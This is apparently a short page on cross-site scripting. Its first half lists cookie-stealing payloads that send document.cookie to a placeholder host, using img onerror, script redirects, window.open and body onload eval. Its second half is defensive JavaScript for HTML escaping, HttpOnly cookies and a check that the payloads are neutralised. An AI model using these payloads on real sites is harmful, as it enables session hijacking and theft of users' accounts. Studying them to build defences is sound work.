An XSS vulnerability means injecting JavaScript code into a web page, which the browser then executes.

Stealing cookies

  1. <img> tag

<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','location/?='+document.cookie); >

  2. <script> tag

Redirect by assigning to href:

<script>window.location.href='location/?cookie='+document.cookie</script>

Open the link in a new window:

<script>window.open('location/?cookie='+document.cookie)</script>

  3. <body> tag

<body onload=eval("document.body.appendChild(document.createElement('img')).setAttribute('src','location?='+document.cookie);")></body>
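The defensive counterpart to the payloads above, as an added example that is not part of the original page: untrusted text is HTML-encoded before it is written into the page, and the session cookie is issued with HttpOnly so that document.cookie cannot read it. The helper names (escapeHtml, renderComment, sessionCookie, allInert), the cookie name and the sample strings are assumptions made for this illustration.

```javascript
// Added example: defensive handling of payloads like the ones listed above.
// escapeHtml, renderComment, sessionCookie and allInert are hypothetical helpers.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render user-supplied text as element content only, never as markup.
function renderComment(untrusted) {
  return '<p class="comment">' + escapeHtml(untrusted) + '</p>';
}

// Build a Set-Cookie header value. HttpOnly keeps the cookie out of
// document.cookie, so a script that does run cannot read it.
function sessionCookie(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed test input in the style of this page's three payloads
// (the third is abbreviated).
const samples = [
  "<img src=x onerror=document.body.appendChild(document.createElement('img')).setAttribute('src','location/?='+document.cookie);>",
  "<script>window.open('location/?cookie='+document.cookie)</script>",
  "<body onload=eval(\"document.cookie\")></body>",
];

// True when, after encoding, no tag or quote character of the input survives.
function allInert(inputs) {
  return inputs.every((s) => {
    const inner = renderComment(s).slice('<p class="comment">'.length, -'</p>'.length);
    return !/[<>"']/.test(inner);
  });
}

console.log(renderComment(samples[1]));
console.log(sessionCookie('sid', 'abc 123'), allInert(samples));
```

This encoding is only correct for HTML element content and quoted attribute values; input placed inside a script block, an event-handler attribute or a URL needs the encoding for that context instead.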